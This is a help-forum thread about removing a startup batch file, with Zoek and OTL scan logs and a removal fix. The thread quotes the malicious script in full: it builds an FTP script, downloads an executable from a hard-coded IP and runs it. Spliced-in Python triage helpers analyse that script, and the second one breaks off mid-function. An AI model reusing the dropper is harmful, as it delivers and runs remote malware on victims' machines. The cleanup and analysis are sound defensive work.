gvl Super Zumbi Registered
9.4K Messages 576 Likes

[Solved] Malicious script

#1 By gvl 11/11/2012 - 10:17
Hello, friends

I found the code below in the startup of a machine; it seems to transfer the executable 4.exe via FTP.

I would like to understand what this code really does.

Thanks for any help.

@echo off
@echo off>x
mode con: COLS=15 lines=10>x
@echo open 199.36.75.225>x
@echo 123>>x
@echo 123>>x
echo get c:\4.exe>>x
@echo bye>>X
@ftp -s:x
start C:\4.exe>>x
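A triage helper for the script quoted above, added here as an example (it is not code from the thread): it reconstructs the FTP script that the batch writes with its echo redirections and reports the host, the login answers, the file fetched and the file started, which is what a responder needs to block the server and hunt for the dropped binary. The names analyze_batch and FtpDropperReport are assumptions of this example.

```python
"""Triage helper for batch files that build an FTP script and run ftp -s:<file>."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample input: the startup script quoted in the post above.
SAMPLE_BAT = r"""@echo off
@echo off>x
mode con: COLS=15 lines=10>x
@echo open 199.36.75.225>x
@echo 123>>x
@echo 123>>x
echo get c:\4.exe>>x
@echo bye>>X
@ftp -s:x
start C:\4.exe>>x
"""

ECHO_REDIRECT = re.compile(r"^@?echo\s+(.*?)\s*(>>|>)\s*(\S+)$", re.IGNORECASE)
FTP_SCRIPT = re.compile(r"^@?ftp\b.*?-s:(\S+)", re.IGNORECASE)
START_CMD = re.compile(r'^@?start\s+(?:"[^"]*"\s+)?([^\s>]+)', re.IGNORECASE)
# ftp.exe script verbs; any other line after "open" is an answer to the login prompts.
FTP_VERBS = {"open", "user", "get", "mget", "put", "binary", "ascii",
             "cd", "lcd", "prompt", "bye", "quit"}


@dataclass
class FtpDropperReport:
    script_file: Optional[str] = None
    host: Optional[str] = None
    login_lines: list = field(default_factory=list)   # username/password answers
    fetched: list = field(default_factory=list)       # files pulled from the server
    executed: list = field(default_factory=list)      # files launched afterwards

    @property
    def is_ftp_dropper(self) -> bool:
        # Downloads over FTP from a generated script and then starts something.
        return bool(self.script_file and self.host and self.fetched and self.executed)


def analyze_batch(text: str) -> FtpDropperReport:
    report = FtpDropperReport()
    files = {}  # lower-cased redirect target -> lines the batch would write into it
    for raw in text.splitlines():
        line = raw.strip()
        m = ECHO_REDIRECT.match(line)
        if m:
            payload, op, target = m.group(1), m.group(2), m.group(3).lower()
            if op == ">":                 # ">" truncates, ">>" appends
                files[target] = []
            if payload.lower() not in ("on", "off"):  # "echo off>x" only creates x
                files.setdefault(target, []).append(payload)
            continue
        m = FTP_SCRIPT.match(line)
        if m:
            report.script_file = m.group(1)
            for entry in files.get(m.group(1).lower(), []):
                verb, _, arg = entry.partition(" ")
                if verb.lower() == "open":
                    report.host = arg.strip()
                elif verb.lower() in ("get", "mget"):
                    report.fetched.append(arg.strip())
                elif verb.lower() not in FTP_VERBS:
                    report.login_lines.append(entry)
            continue
        m = START_CMD.match(line)
        if m:
            report.executed.append(m.group(1))
    return report


if __name__ == "__main__":
    r = analyze_batch(SAMPLE_BAT)
    print(f"FTP dropper: {r.is_ftp_dropper}; host={r.host}; login={r.login_lines}; "
          f"fetched={r.fetched}; executed={r.executed}")
```

The report flags the host to block and the fetched file name to search for on disk; the two bare "123" lines are the answers ftp.exe feeds to the username and password prompts.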
#16 By gvl
11/06/2013 - 06:28
Hello, Wings

I disabled the antivirus,
ran it as administrator,
changed the options in compatibility mode, and Zoek still would not run.

Yesterday I left a full Norman scan running and it found something:
C:\Windows\System32\cmd.txt: File infected with text/DownBat.A
Delete file: C:\Windows\System32\cmd.txt
Cleaning successful
Edit:

I was looking into it here and this program needs access to the Windows Command Prompt, which in my case was blocked. It is running now.

http://cjoint.com/?3Flmgjl8Xoh
#22 By gvl
11/06/2013 - 10:02
Wings,

Here is the report:

Zoek.exe Version 4.0.0.2 Updated 03-June-2013
Tool run by xxxxxxxx on 11/06/2013 at 10:01:09,30.
Microsoft Windows 7 Professional 6.1.7600 x86
Running in: Normal Mode Internet Access Detected

==== Registry Fix Code ======================

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^360.bat]

==== Deleting Files \ Folders ======================

"C:\Windows\pss\360.bat" not found

==== EOF on 11/06/2013 at 10:01:42,28 ======================
#24 By gvl
11/06/2013 - 10:11
Wings,

Here is the report:

Zoek.exe Version 4.0.0.2 Updated 03-June-2013
Tool run by xxxxxxxx on 11/06/2013 at 10:04:55,10.
Microsoft Windows 7 Professional 6.1.7600 x86
Running in: Normal Mode Internet Access Detected

==== Running Processes ======================

C:\Windows\System32\smss.exe
C:\Windows\system32\csrss.exe
C:\Windows\system32\wininit.exe
C:\Windows\system32\csrss.exe
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\winlogon.exe
C:\Windows\system32\LogonUI.exe
C:\Windows\System32\spoolsv.exe
C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\avp.exe
C:\Program Files\FileZilla Server\FileZilla Server.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbamscheduler.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
C:\Program Files\Microsoft SQL Server\MSAS10_50.MSSQLSERVER\OLAP\bin\msmdsrv.exe
C:\Program Files\Microsoft SQL Server\MSRS10_50.MSSQLSERVER\Reporting Services\ReportServer\bin\ReportingServicesService.exe
C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\SQLAGENT.EXE
C:\Windows\system32\conhost.exe
C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
C:\squid\sbin\squid.exe
C:\Program Files\TightVNC\tvnserver.exe
c:\squid\libexec\unlinkd.exe
C:\Windows\system32\conhost.exe
C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\fdlauncher.exe
C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\fdhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\csrss.exe
C:\Windows\system32\winlogon.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe
C:\Windows\system32\rdpclip.exe
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskhost.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\notepad.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\avp.exe
C:\Program Files\TightVNC\tvnserver.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Unlocker\UnlockerAssistant.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Program Files\Common Files\Java\Java Update\jucheck.exe
C:\Windows\system32\csrss.exe
C:\Windows\system32\winlogon.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe
C:\Windows\system32\rdpclip.exe
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskhost.exe
C:\Windows\Explorer.EXE
C:\Program Files\FileZilla Server\FileZilla Server Interface.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\avp.exe
C:\Program Files\TightVNC\tvnserver.exe
C:\Program Files\Unlocker\UnlockerAssistant.exe
C:\Users\Public\TMP\WinCe.exe
C:\Windows\system32\taskhost.exe
C:\Users\xxxxxxxx\Desktop\zoek.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalServicePeerNet

==== System Specs ======================

Windows: Windows XP Professional Service Pack 2 (Build 2600)
Memory (RAM): 3063 MB
CPU Info: Intel(R) Pentium(R) CPU G6950 @ 2.80GHz
CPU Speed: 2800,4 MHz
Sound Card: Áudio Remoto |
Display Adapters: RDPDD Chained DD | RDP Encoder Mirror Driver | RDP Reflector Display Driver
Monitors: 1x;
Screen Resolution: 1152 X 864 - 32 bit
Network: Network Present
Network Adapters: Controlador Ethernet genérico baseado no Marvell Yukon 88E8053
CD / DVD Drives: 1x (D: | ) D: HL-DT-STDVD-ROM DH40N
Ports: COM1 | COM2 LPT Port NOT Present.
Mouse: 3 Button Wheel Mouse Present
Hard Disks: C: 232,6GB
Hard Disks - Free: C: 195,7GB
Manufacturer *: Dell Inc.
BIOS Info: AT/AT COMPATIBLE | 10/18/10 | DELL - 1
Time Zone: Hora oficial do Brasil
Motherboard *: Dell Inc. 07GPTK
Internet Explorer Version: 8.0.7600.16385
Sun Java version: 1.7.0_15
Country: Brasil
Language: PTB

==== Files Recently Created / Modified ======================

====== C:\Windows ====
====== C:\Users\SERVID~1\AppData\Local\Temp ====
====== C:\Windows\system32 =====
2013-06-08 10:53:26 D0AAAE16BA162DD89D646887F1539855 1700352 ----a-w- C:\Windows\System32\gdiplus.dll
2013-06-08 10:53:26 CA2F560921B7B8BE1CF555A5A18D54C3 348160 ----a-w- C:\Windows\System32\msvcr71.dll
2013-06-08 10:53:26 1FD3F9722119BDF7B8CFF0ECD1E84EA6 1060864 ----a-w- C:\Windows\System32\mfc71.dll
====== C:\Windows\system32\drivers =====
====== C:\Windows\Tasks ======
====== C:\Windows\Temp ======
======= C:\Program Files =====
2013-05-25 14:06:00 -------- d-----w- C:\Program Files\InstallJammer Registry
2013-05-25 14:05:56 -------- d-----w- C:\Program Files\Programas RFB
2013-05-23 17:31:54 -------- d-----w- C:\Program Files\Programas_SPED
2013-05-23 17:31:53 -------- d--h--w- C:\Program Files\Zero G Registry
======= C: =====
2013-06-11 12:26:57 565A245B6C76FB4DD67453A41AAB106E 13030 ----a-w- C:\PDOXUSRS.NET
====== C:\Users\xxxxxxxx\AppData\Roaming ======
2013-06-11 09:59:01 -------- d-----w- C:\users\xxxxxxxx\AppData\Local\Temp
2013-06-11 00:41:05 -------- d-----w- C:\users\xxxxxxxx\AppData\Local\Norman Malware Cleaner
2013-06-10 13:22:41 -------- d-----w- C:\users\xxxxxxxx\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker
====== C:\Users\xxxxxxxx ======
2013-06-11 09:58:40 -------- d-----w- C:\Users\Todos os Usuários\Kaspersky Lab
2013-06-10 21:12:56 0F2483E389C4C09A6E1D6686C5EC16E2 704 --sha-r- C:\ProgramData\ntuser.pol
2013-06-10 21:06:38 -------- d-----r- C:\Users\Public\Videos
2013-06-10 21:06:38 -------- d-----r- C:\Users\Public\Pictures
2013-06-08 10:55:13 -------- d-s---w- C:\ProgramData\Shared Space
2013-06-03 10:25:15 -------- d-----w- C:\Users\Public\Music
2013-06-01 07:15:12 -------- d-----w- C:\ProgramData\KingSoft
2013-05-25 14:11:42 -------- d-----w- C:\Users\xxxxxxxx\.receitanet
2013-05-25 13:43:05 -------- d-----w- C:\Users\xxxxxxxx\sped
2013-05-23 17:33:59 -------- d-----w- C:\Users\xxxxxxxx\.spedfiscal
2013-05-23 17:19:17 -------- d--h--w- C:\Users\xxxxxxxx\InstallAnywhere

====== C: exe-files ==
2013-06-10 13:28:24 BE66ACEACC6A6222D661CD475FBA30B2 881715 ----a-w- C:\Program Files\Glary Utilities\unins000.exe
2013-06-10 13:28:24 62E9330776C0C38315DCDC7560DA338C 62240 ----a-w- C:\Program Files\Glary Utilities\upgrade.exe
2013-06-10 13:26:29 016D85DC34357BBE7447411C63D0B731 6696960 ----a-w- C:\xxxx\Glary_Utilities_v2.56.0.1822.exe
2013-06-10 13:22:41 CBC4DC3DC6588687641D7FFD626A0156 98302 ----a-w- C:\Program Files\Unlocker\uninst.exe
2013-06-08 09:54:19 9EF10EE66812F24B9BCB14DE5991F4FC 130846192 ----a-w- C:\xxxx\cfw_installer.exe
=== C: other files ==
2013-06-07 16:45:49 129FE37998819A0D07E9B2B83C450BDE 4621 ------w- C:\NFe\ATUAL 07-06-13\xxxx\xxxx MARCO 2013\NFE.ZIP
2013-06-07 16:45:47 F032505E3EAD6BD1C54CAECBBFEE6CFF 5430 ------w- C:\NFe\ATUAL 07-06-13\xxxx\xxxx MARCO 2013\2-40167070.zip
2013-06-07 16:45:47 22CA9E793492593577895EB4D5C1468A 4677 ------w- C:\NFe\ATUAL 07-06-13\xxxx\xxxx MAIO 2013\NFE.ZIP
2013-06-07 16:45:46 9EDC0D6786F0B5A6F71ED4BBE0879CA9 5198 ------w- C:\NFe\ATUAL 07-06-13\xxxx\xxxx FEVEREIRO 2013\NFE.ZIP
2013-06-07 16:45:46 2E529F48FB5237B1D12E4D40B95EA398 4774 ------w- C:\NFe\ATUAL 07-06-13\xxxx\xxxx JANEIRO 2013\NFE.ZIP
2013-06-07 16:45:45 D7CFDF74E7319ECDFCE7F1F77AFEB07A 4665 ------w- C:\NFe\ATUAL 07-06-13\xxxx\xxxx ABRIL 2013\NFE.ZIP
2013-06-07 16:45:11 28707CECAC38042741C2BFAAE2AE46D9 4735 ------w- C:\NFe\ATUAL 07-06-13\xxxx\xxxx MARCO 2013\NFE.ZIP
2013-06-07 16:45:10 FA36EF9B70D021365A71374D96865EF5 4764 ------w- C:\NFe\ATUAL 07-06-13\xxxx\xxxx FEVEREIRO 2013\NFE.ZIP

==== Startup Registry Enabled ======================

[HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="%ProgramFiles%\Windows\Sidebar.exe /autoRun"

[HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="%ProgramFiles%\Windows\Sidebar.exe /autoRun"

[HKEY_USERS\S-1-5-21-3320972484-280281306-3388420964-1019\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="%ProgramFiles%\Windows\Sidebar.exe /autoRun"

[HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"mctadmin"="C:\Windows\System32\mctadmin.exe"

[HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"mctadmin"="C:\Windows\System32\mctadmin.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"FileZilla Server Interface"="C:\Program Files\FileZilla Server\FileZilla Server Interface.exe"
"Adobe ARM"="C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
"GrooveMonitor"="C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
"AVP"="C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\avp.exe"
"tvncontrol"="C:\Program Files\TightVNC\tvnserver.exe -controlservice -slave"
"SunJavaUpdateSched"="C:\Program Files\Common Files\Java\Java Update\jusched.exe"
"UnlockerAssistant"="C:\Program Files\Unlocker\UnlockerAssistant.exe"

==== Startup Registry Disabled ======================

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\cao]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="cao"
"hkey"="HKLM"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\gbrspcontrol]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="gbrspcontrol"
"hkey"="HKLM"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\PrinterShare]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="PrinterShare"
"hkey"="HKCU"


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^360.bat]
"backup"="C:\\Windows\\pss\\360.bat.CommonStartup"
"backupExtension"=".CommonStartup"
"item"="360"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Start GeekBuddy.lnk]
"backupExtension"=".CommonStartup"
"item"="Start GeekBuddy"


==== Task Scheduler Jobs ======================

C:\Windows\tasks\Adobe Flash Player Updater.job --a------ C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [07/06/2013 09:08]
C:\Windows\tasks\GlaryInitialize.job --a------ C:\Program Files\Glary Utilities\initialize.exe [27/05/2013 16:51]

==== Firefox Extensions ======================

==== Firefox Plugins ======================

Profilepath: C:\Users\xxxxxxxx\AppData\Roaming\Mozilla\Firefox\Profiles\uorss01j.default
AFD9010DC500096809C2784551909304 - C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll - Java(TM) Platform SE 7 U15
1B197A0ED28DB310AB67591567C3787A - C:\Windows\system32\npdeployJava1.dll - Java Deployment Toolkit 7.0.150.3
6F120933F87E7DEC972476170288A267 - C:\Program Files\Adobe\Reader 10.0\Reader\browser\nppdf32.dll - Adobe Acrobat
0BD343C45B4ECCF8D6AF94D6C3ADC310 - C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll - Adobe Acrobat
15E298B5EC5B89C5994A59863969D9FF - C:\Windows\system32\npmproxy.dll - Microsoft® Windows® Operating System


==== Chrome Look ======================

HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions
dchlnpcodkpfdpacogkljefecpegganj - C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\ChromeExt\urladvisor.crx[18/08/2012 14:06]
hghkgaeecgjhjkannahfamoehjmkjail - C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\ChromeExt\content_blocker_chrome.crx[18/08/2012 14:06]
jagncdcchgajhfhijbbhecadmaiegcmh - C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\ChromeExt\virtkbd.crx[22/04/2013 04:58]

==== IE Start and Search Settings ======================

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.google.com"
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"

==== All HKCU SearchScopes ======================

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes
{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing Url="http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC"
{6A1806CD-94D4-4689-BA73-E35EA1EA9990} Google Url="http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}"

==== HijackThis Entries ======================

O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: ContentBlockerBrowserHelperObject - {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} - C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\IEExt\ContentBlocker\ie_content_blocker_plugin.dll
O2 - BHO: VirtualKeyboardBrowserHelperObject - {73455575-E40C-433C-9784-C78DC7761455} - C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll
O2 - BHO: link filter bho - {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\IEExt\UrlAdvisor\klwtbbho.dll
O3 - Toolbar: (no name) - {D4027C7F-154A-4066-A1AD-4243D8127440} - (no file)
O4 - HKLM\..\Run: [FileZilla Server Interface] "C:\Program Files\FileZilla Server\FileZilla Server Interface.exe"
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [GrooveMonitor] "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
O4 - HKLM\..\Run: [AVP] "C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\avp.exe"
O4 - HKLM\..\Run: [tvncontrol] "C:\Program Files\TightVNC\tvnserver.exe" -controlservice -slave
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [UnlockerAssistant] "C:\Program Files\Unlocker\UnlockerAssistant.exe"
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'SERVIÇO LOCAL')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'SERVIÇO LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'SERVIÇO DE REDE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'SERVIÇO DE REDE')
O4 - HKUS\S-1-5-21-3320972484-280281306-3388420964-1019\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'Dataminas')
O9 - Extra button: Teclado Virtual - {0C4CC089-D306-440D-9772-464E226F6539} - C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
O9 - Extra button: Enviar para o OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~4\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: &Enviar para o OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~4\Office12\ONBttnIE.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~4\Office12\REFIEBAR.DLL
O9 - Extra button: Verificação de URLs - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\IEExt\UrlAdvisor\klwtbbho.dll
O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - http://download.eset.com/special/eos/OnlineScanner.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{488832D2-5BFC-4748-8C6B-0C4E6DF9246B}: NameServer = 186.250.135.1
O17 - HKLM\System\CCS\Services\Tcpip\..\{5D1ACB20-0BF5-4778-A377-E3997409E27D}: NameServer = 186.250.135.1
O17 - HKLM\System\CS1\Services\Tcpip\..\{488832D2-5BFC-4748-8C6B-0C4E6DF9246B}: NameServer = 186.250.135.1
O17 - HKLM\System\CS2\Services\Tcpip\..\{488832D2-5BFC-4748-8C6B-0C4E6DF9246B}: NameServer = 186.250.135.1
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~1\MICROS~4\Office12\GRA32A~1.DLL
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: Serviço do Kaspersky Anti-Virus (AVP) - Kaspersky Lab ZAO - C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\avp.exe
O23 - Service: FileZilla Server FTP server (FileZilla Server) - FileZilla Project - C:\Program Files\FileZilla Server\FileZilla Server.exe
O23 - Service: MBAMScheduler - Malwarebytes Corporation - C:\Program Files\Malwarebytes' Anti-Malware\mbamscheduler.exe
O23 - Service: MBAMService - Malwarebytes Corporation - C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: SquidNT - SQUID Web Proxy Cache - http://www.squid-cache.org/ - C:\squid\sbin\squid.exe
O23 - Service: TightVNC Server (tvnserver) - GlavSoft LLC. - C:\Program Files\TightVNC\tvnserver.exe

==== EOF on 11/06/2013 at 10:08:22,98 ======================
#26 By gvl
11/06/2013 - 10:32
Wings,

Here is the report:

OTL logfile created on: 11/06/2013 10:31:39 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\xxxxxxxx\Desktop
Professional (Version = 6.1.7600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.7600.16385)
Locale: 00000416 | Country: Brasil | Language: PTB | Date Format: dd/MM/yyyy

2,99 Gb Total Physical Memory | 1,19 Gb Available Physical Memory | 39,93% Memory free
5,98 Gb Paging File | 3,98 Gb Available in Paging File | 66,57% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 232,63 Gb Total Space | 195,65 Gb Free Space | 84,10% Space Free | Partition Type: NTFS

Computer Name: xxxxxxxx | User Name: xxxxxxxx | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: Off | File Age = 30 Days

========== Custom Scans ==========

< HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder /s >
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^360.bat]
"backup" = C:\Windows\pss\360.bat.CommonStartup
"location" = C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup -- [2013/06/10 07:33:30 | 000,000,000 | R--D | M]
"backupExtension" = .CommonStartup
"item" = 360
"YEAR" = 2012
"MONTH" = 11
"DAY" = 13
"HOUR" = 14
"MINUTE" = 49
"SECOND" = 28
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Start GeekBuddy.lnk]
"location" = C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup -- [2013/06/10 07:33:30 | 000,000,000 | R--D | M]
"backupExtension" = .CommonStartup
"item" = Start GeekBuddy
"YEAR" = 2013
"MONTH" = 6
"DAY" = 10
"HOUR" = 7
"MINUTE" = 33
"SECOND" = 30

< End of report >
Wings Cyber Highlander Registered
20.3K Messages 1.2K Likes
#27 By Wings
11/06/2013 - 10:38
Run OTL

*Copy and paste the lines in brown into the box under Custom Scans/Fixes

:Reg
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^360.bat]

:Commands
[reboot]

*Click [Fix]

*Click [OK] to restart the PC

*Paste the report shown after Windows starts up
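To show what this fix removes, here is an added example (my own code, not OTL's or Zoek's): it parses the "Startup Registry Disabled" section of a Zoek report like the one posted above, decodes the original startup-folder path that MSConfig stores in the subkey name with "^" in place of "\", and emits the OTL :Reg lines that delete the selected items. The functions parse_startupfolder and otl_reg_fix, and the sample section, are assumptions of this example.

```python
"""Builds OTL ':Reg' fix lines for MSConfig startupfolder entries in a Zoek report."""
import re

# Constructed sample: the startupfolder part of the Zoek report posted above.
SAMPLE_SECTION = r"""==== Startup Registry Disabled ======================

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^360.bat]
"backup"="C:\\Windows\\pss\\360.bat.CommonStartup"
"backupExtension"=".CommonStartup"
"item"="360"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Start GeekBuddy.lnk]
"backupExtension"=".CommonStartup"
"item"="Start GeekBuddy"

==== Task Scheduler Jobs ======================
"""

STARTUPFOLDER = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder"
KEY_LINE = re.compile(r"^\[(" + re.escape(STARTUPFOLDER) + r"\\(.+))\]$")
VALUE_LINE = re.compile(r'^"([^"]+)"="(.*)"$')


def parse_startupfolder(section: str) -> list:
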